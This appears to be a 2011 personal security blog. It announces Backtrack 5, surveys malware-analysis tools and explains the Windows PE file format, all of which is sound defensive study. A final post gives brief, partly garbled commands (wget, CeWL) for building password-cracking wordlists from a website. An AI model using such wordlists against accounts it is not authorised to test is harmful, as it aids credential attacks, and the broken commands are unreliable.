Backtrack 5 is out folks. Head on over to the backtrack website to get yourself a copy of this well put together masterpiece. There are 32 and 64 bit versions available now, as well as the classic KDE styled version and a new GNOME version, which put you in an Ubuntu like environment. I've decided to go with the Gnome version, as im use to Ubuntu and it was refreshing to use something other than the classic desktop environment. All versions should have the same tools and capabilities so its all a matter of preference.

What are you waiting for? Get your copy here.

Wednesday, April 13, 2011

Usefull malware analysis tools

Was reading some articles from an e-magazine @ involving basic malware analysis techniques. Why would anyone (the average person) want to do this? Maybe some people just have alot of time on their hands or like me, just want to know how everything works. It is very important for anti-virus vendors to do malware analysis in order to produce signatures to identify the malware throughout scans. If you got some time on your hands, i suggest that you drop by and check out some of the articles including the ones relating to malware analysis.


Regshot: This tool, as it names says, takes a snapshot of the regisrty. It basically gives you a baseline of what the registry looks like at that point in time. Given that baseline, you can then execute the suspicious executable, then take another registry snapshot. You are then able to compare both snapshots using regshot's compare feature to find out what keys have been added, modified or deleted. It has the option of outputing its results in a text file or a nicely formated HTML file.

Regmon: Like regshot, regmon is registry utility that operates in a slightly different manner. It has the ability to give real time analysis of what keys (and their location) currently running processes are accessing. It lets you know whether the process is querying information, creating new keys, setting values, etc. Just before you execute the malware, you can have regmon running in the background capturing its information. When the program has been executed, you can stop regmon's capture and perform your analysis. You would notice that while regmon was capturing data, it not only captured information for the malware process you are investigation, but also other processes as well that were recently accessing the registry. Thankfully, there is a nice filter feature that allows you to filter the captured data based on the process name. Although the filter is very limited, it is still beneficial to have. You can also look into another tool called procmon, who is the current successor of the tools regmon and filemon. It has the same capabilities of regmon and many more options. However, regmon still has its place and is simple to use and learn.

Filemon: This tool works in a similar fascion to regmon, but with files. It monitors processes that access files on the disk and log their actions(read, write, query, delete,etc) and whether they were successful or not. Like regmon, just before you execute the malware, you can have filemon running in the background capturing its information. When the target program has been executed, you can stop filemon's capture and perform your analysis.

Wireshark and Netcat: It is known that some malware tend to want to replicate themselves over the network. Some may try to covertly download software or try to log onto some IRC channel to query its commands (google: botnet). These tools are coded to work covertly, so while you're sitting at your desktop, you would not see any indication that anything is going on. Wireshark can help us understand the why, where, what, when and who questions. Why is the malware connecting out to port 4444; where is the malware trying to connect to; when or at what intervals does the malware initiate any type of network traffic; what is the malware trying to do or accomplish; who is involved (source IPs, mac addresses, domains etc.). Netcat can be set up to intercept this traffic in a proxy mode and also be used to interact/respond to services and requests.

Netstat and tasklist: Before analyzing any piece of malware, having a baseline is very vital. You are gonna need to have an idea of what the system looked like before and after the malware was run. Running netstat and tasklist before running the executable can give us a baseline of what network sessions are open and ports that are listening etc. while the tasklist command utility can give us a list of currently running processes. Tools that you can be use as well are sysinternal's process explorer and tcpview.

Debugger, Ollydbg: To really get in depth with exactly what the executable is doing, you will have to use a debbuger to step through the system opcodes and system calls. Using a debugger is not easy for most and can take a little bit of getting use to. However, to be good at malware analysis, you cannont escape not learning how to use a debugger like IDA pro or in my case, Ollydbg.

Virtual environment: To avoid potentially infecting your main system and possibly breaking your Windows OS, you will definitly want to perform most, if not all, your analysis in a virtual environment. Virtual machines also provides us with a mechanism to roll back a host to a snapshot of a system at an earlier time. This allows us to restore the state of a system to a point just before an event occured (say the malware caused the OS to no longer start up) withing minutes. There are quite a few options avaialble for virtualization but i myself use the Virtualbox technology. Remeber to check out the system requirements of these technologies before installing to your old pentium three laptop with 256 ram.

PE tools: Sometimes malware may be packed by common packer tools, like UPX. The benifit of using a packer on an EXE file is that it can allow for the compression of the executable. However, by doing so, the original exe's form is thus changed. Eventually, what you get is an exe within an exe. The outer layer exe will be the packers decompression code that decompresses the internal exe in memory and then executes it. The additional benifit of this is that it can make debugging of this packed executable a pain in the but. In order to properly debug the functionality of the packed executable, it must first be decompressed in order to be analyzed. Tools like PeID can help us identify a packed executable's packer. By knowing this, we can potentially in some cases use the same packer to unpack the executable back to its original form. Another PE tool that i use is Lordpe, which allows for the modifying of the PE headers of binary executables.

These are just some tools that can be utilized in malware analysis process. I encourage you to do your own research and look up the malware analysis articles in the website. The articles are available in PDF format and is a little bit difficult to directly link to :(

Resources/Good Reading:

Wednesday, March 23, 2011

Windows and its PE file structure

I'll start this post of by asking a question; WTF is a PE file? A PE file is something we use on a day to day basis when we use our computer systems. The files that have the ".exe" and ".dll" extensions are what we refer to as PE (Portable executable) files. A PE file contains one of the most complex file structures that i've ever seen and its very important to understand most, if not all of it if you want to be modify the binary file or become a reverse-engineer. Becasue there are so many structures, i can't go through them all (i don't even understand 50% of them) but i will try to focus on the most common ones.

For a visual of what the structure looks like, goto google images and search "PE file format".
Here is one that i found and usually reference: link

[ MZ header] - "hex bytes: 4d 5a"
[ Dos stub ] - "This program cannot be run in dos mode"
[PE header] - "Hex bytes: 50 45 00 00"
[optional header]
[Data directory] - "Structure of important locations such as import table, export table, etc."
[Section table header] - "array of structures describing the properties of each section."
[section 1]
[section 2]
[section n]

Every PE file should contain the above information. The very first two bytes of the file should be "4d5a", which is MZ. This indicates the start of the dos header. At position 0x3c in the Dos header, is a dword (4 bytes) that indicates the offset of the start of PE header. Directly after this should be the DOS stub that basically prints a string saying that this program cannot be run in dos mode or something similar.

Following the dword offset at positon 0x3c should take you to the start of the PE header and should containt the hex bytes "50 45 00 00". Other useful information contained in here include . the machine type (i386, i686, etc.) , the number of sections and size of optional header.

24 bytes from the PE header starts the Optional header. This structure is in every PE file and isn't really optional as it may suggest. It contains many relevant fields that the windows loader needs in order to load the file correctly into memory.

The data directory is a listing of the locations of important data such as the import tables (when you use functions from windows DLLS, you have to import them.) and export tables.

Section header is a structure containting the properties of each section. This information includes its name, its size on disk and in memory and its location.

The last sections will house the individual sections referenced in the section header. You can use the information in the section header to find the relevant offsets and size of each section.

Sunday, January 30, 2011

Custom wordlist

Heres two ways to create custom wordlist with backtrack 4 R2.


Way #1:

# wget -r -l 3

'-r' recurse
'-l' recusrsion depth level

# -o wordlist.lst /root/


Way #2

ruby cewl.rb --depth 3 -w ~/wordlist.lst